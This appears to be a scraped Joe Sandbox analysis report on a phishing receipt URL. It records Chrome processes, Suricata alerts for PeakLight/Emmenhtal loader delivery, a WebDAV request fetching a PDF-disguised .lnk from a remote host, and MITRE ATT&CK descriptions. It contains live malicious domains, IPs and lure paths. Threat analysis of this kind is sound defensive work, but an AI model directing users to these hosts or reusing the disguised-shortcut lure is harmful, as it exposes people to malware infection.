xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-18T19:29:56Z</D:creationdate><D:quota-used-bytes>31349362688</D:

Target ID:	0
Start time:	15:13:49
Start date:	14/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	15:13:52
Start date:	14/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1960,i,11034920295677954142,14966904882393633339,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:13:59
Start date:	14/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://caringforyousupport.com.au/Receipt536354.php"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_60, type: DROPPED

Source: Network traffic	Suricata IDS: 2055990 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Request : 192.168.2.5:49825 -> 154.216.17.175:5030
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49793 -> 154.216.17.175:5030
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49768 -> 154.216.17.175:5030
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49833 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2058178 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery Template Observed : 27.123.25.1:443 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2058179 - Severity 1 - ET MALWARE PeakLight/Emmenhtal Loader Payload Delivery WebPage Observed : 27.123.25.1:443 -> 192.168.2.5:49714

Source: global traffic	HTTP traffic detected: GET /Receipt536354.php HTTP/1.1Host: caringforyousupport.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1Host: winaero.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://caringforyousupport.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1Host: winaero.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /1B20GBSUBNSAFGEVA/1B20GBSUBNSAFGEVA_pdf.lnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: alljsnybsafva.living:5030

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: caringforyousupport.com.au
Source: global traffic	DNS traffic detected: DNS query: winaero.com
Source: global traffic	DNS traffic detected: DNS query: alljsnybsafva.living

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://caringforyousupport.com.au/Receipt536354.php

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Static File Info

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
https://caringforyousupport.com.au/Receipt536354.php